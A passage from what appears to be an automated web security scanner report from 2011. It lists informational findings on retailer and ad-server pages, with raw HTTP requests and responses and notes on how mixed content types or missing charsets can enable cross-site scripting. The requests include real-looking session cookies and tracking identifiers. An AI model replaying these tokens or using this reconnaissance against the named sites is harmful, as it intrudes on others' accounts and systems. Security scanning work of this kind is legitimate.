Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.3.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:29:38 GMT
Content-Length: 38918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...

23.17. https://www.restorationhardware.com/my-account/forgot-password.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/forgot-password.jsp

Request

GET /my-account/forgot-password.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; engagement=4; fsr.s={"v":1,"rid":"1305509997099_983249","pv":3,"to":5,"c":"https://www.restorationhardware.com/my-account/sign-in.jsp","lc":{"d0":{"v":3,"s":false,"e":1}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; cmRS=&t1=1305511192547&t2=1305511197283&t3=1305541160118&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20sign-in&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517&ul=https%3A//www.restorationhardware.com&rf=http%3A//www.restorationhardware.com/content/promo.jsp%3Fid%3D138040%26%26link%3DSFGalleryStore

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:24:01 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=b72ce5406b61a765c4dbe2b4990160aa2efa223a5124b4964dd0ffea; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:24:00 GMT
Content-Length: 17767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

23.18. https://www.restorationhardware.com/my-account/register.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/register.jsp

Request

GET /my-account/register.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/forgot-password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; TS1c138a=27552492896cbb9145e280ea3c546c112efa223a5124b4964dd0fed4; engagement=5; fsr.s={"v":1,"rid":"1305509997099_983249","pv":4,"to":5,"c":"https://www.restorationhardware.com/my-account/forgot-password.jsp","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0,"f":1305541164254,"cp":{"my-account":"visited"}}; cmRS=&t1=1305541182545&t2=1305541183619&t3=1305541273137&t4=1305541164256&fti=&fn=requestPassword%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20forgot-password&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:32:23 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=c8ca4c79fc3e7bb28d932b5bb1dcf3292efa223a5124b4964dd101e1; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:32:23 GMT
Content-Length: 20125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

23.19. https://www.restorationhardware.com/my-account/sign-in.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/sign-in.jsp

Request

GET /my-account/sign-in.jsp?link=topnav_signin HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511164164

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:55 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=ef27e626254569019b6a3249227030c92efa223a5124b4964dd08c1b; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:55 GMT
Content-Length: 19152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

23.20. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/data/json/profile-status.jsp

Request

GET /sitewide/data/json/profile-status.jsp?_=1305511192551 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511192538; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 94
Date: Mon, 16 May 2011 02:10:10 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=5bd8da43812e2d44f3717ac9451ad5a82efa223a5124b4964dd08c2a; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:10 GMT


{"status":"-1","cartCount":"0"
   ,"wishList":"gl390568157"
   ,"giftLists":[]
   ,"firstName":""}

23.21. https://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/footer/email-sign-up.jsp

Request

GET /sitewide/includes/footer/email-sign-up.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:59:59 GMT
Connection: keep-alive
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 01:59:59 GMT
Content-Length: 2371

<h3 class="brand">Email Signup</h3>
<form action="/customer-service/footer-email-signup-thank-you.jsp" class="hasrequired" name="submitEmail" method="get" id="submitEmail"><input value="ISO-8859-1" ty
...[SNIP]...

23.22. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/header/expanding-banner-controller.jsp

Request

GET /sitewide/includes/header/expanding-banner-controller.jsp?categoryId=&section=my-account&subsection=sign-in&_=1305511197171 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:10:21 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=f5d76e447a12f51b020b9a893d636ab62efa223a5124b4964dd08c32; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:18 GMT
Content-Length: 923

<script type="text/javascript">
       $(document).ready(function() {
           // Drop Down Banners with parameters for: banner div, cookie name, delay before appearing (in seconds), delay before disappearing (i
...[SNIP]...

23.23. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/header/search.jsp

Request

GET /sitewide/includes/header/search.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:10:21 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; Path=/
Set-Cookie: TS1c138a=f0a5fd2add35545830b6a4f9fdab0b712efa223a5124b4964dd08c35; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:20 GMT
Content-Length: 1134

<script type="text/javascript" charset="utf-8">
                   typeAhead('#search-input-field',5);
               </script>
           <form action="/search/results.jsp" class="hasrequired header-search" method="get"><input value
...[SNIP]...

23.24. https://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.toshibadirect.com
Path:   /js/coremetrics/emptyfunctions.inc

Request

GET /js/coremetrics/emptyfunctions.inc HTTP/1.1
Host: www.toshibadirect.com
Connection: keep-alive
Referer: https://www.toshibadirect.com/td/b2c/myaccount.to
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1730020066.1305542428@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_nr%3D1305511275999%7C1308103275999%3B%20s_vnum%3D1308102050353%2526vn%253D2%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%252C%255B'Referrers'%252C'1305542445659'%255D%255D%7C1463395245659%3B%20s_invisit%3Dtrue%7C1305544320370%3B%20omtr_lv%3D1305542520372%7C1400150520372%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305544320372%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305544320381%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B%20s_ppv%3D32%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Tue, 24 Nov 2009 23:13:36 GMT
Accept-Ranges: bytes
Content-Length: 1064
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

<!--
function callCMEventTag(){}
function cmCreateConversionEventTag(){}
function cmCreateCouponOrderTag(){}
function cmCreateCouponTag(){}
function cmCreateDefaultPageviewTag(){}
function cmCreateErr
...[SNIP]...

23.25. https://www.toshibadirect.com/td/b2c/headerAjax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.toshibadirect.com
Path:   /td/b2c/headerAjax.jsp

Request

GET /td/b2c/headerAjax.jsp?ts=1305542709474 HTTP/1.1
Host: www.toshibadirect.com
Connection: keep-alive
Referer: https://www.toshibadirect.com/td/b2c/myaccount.to
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1730020066.1305542428@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_nr%3D1305511275999%7C1308103275999%3B%20s_vnum%3D1308102050353%2526vn%253D2%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%252C%255B'Referrers'%252C'1305542445659'%255D%255D%7C1463395245659%3B%20s_invisit%3Dtrue%7C1305544320370%3B%20omtr_lv%3D1305542520372%7C1400150520372%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305544320372%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305544320381%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B%20s_ppv%3D32%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: tais.current.segment=HHO;Expires=Fri, 15-Jul-2011 10:45:18 GMT
Content-Length: 40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


$0.00



23.26. https://www.toshibadirect.com/td/b2c/myaccount.to

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.toshibadirect.com
Path:   /td/b2c/myaccount.to

Request

GET /td/b2c/myaccount.to HTTP/1.1
Host: www.toshibadirect.com
Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20s_invisit%3Dtrue%7C1305513075995%3B%20omtr_lv%3D1305511275997%7C1400119275997%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305513075997%3B%20s_nr%3D1305511275999%7C1308103275999%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305513076003%3B; s_sess=%20s_cc%3Dtrue%3B%20omtr_eVar49%3DD%253Dc49%3B%20s_ppv%3D34%3B%20SC_LINKS%3DSearch%253ALaptops%2520Home%2520Page%255E%255EMy%2520Account%255E%255ESearch%253ALaptops%2520Home%2520Page%2520%257C%2520My%2520Account%255E%255E%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dtoshibadirectprod%252Ctoshibaglobal%253D%252526pid%25253DSearch%2525253ALaptops%25252520Home%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.toshibadirect.com%2525252Ftd%2525252Fb2c%2525252Fmyaccount.to%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: tais.current.segment=HHO;Expires=Fri, 15-Jul-2011 10:45:00 GMT
Set-Cookie: tais.current.segment=HHO;Expires=Fri, 15-Jul-2011 10:45:00 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 74134


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 19 $ $Workfile: login.jsp $ -->



...[SNIP]...

24. Multiple content types specified
There are 2 instances of this issue:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


24.1. http://tags.mediaforge.com/if/50

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.mediaforge.com
Path:   /if/50

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /if/50 HTTP/1.1
Host: tags.mediaforge.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uID=CqDfQk3P0kKbugOgCW2AAg==

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:12 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
PRAGMA: no-cache
Server: nginx/0.8.53
Content-Length: 1443
Connection: keep-alive

<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div';
...[SNIP]...

24.2. http://tags.mediaforge.com/pix/50

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.mediaforge.com
Path:   /pix/50

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /pix/50?type=pos HTTP/1.1
Host: tags.mediaforge.com
Proxy-Connection: keep-alive
Referer: http://tags.mediaforge.com/if/50
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uID=CqDfQk3P0kKbugOgCW2AAg==

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:13 GMT
PRAGMA: no-cache
Server: nginx/0.8.53
Content-Length: 39
Connection: keep-alive

<html><head></head><body></body></html>

25. HTML does not specify charset
There are 17 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


25.1. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=97454&rnd=513812.7808459103 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
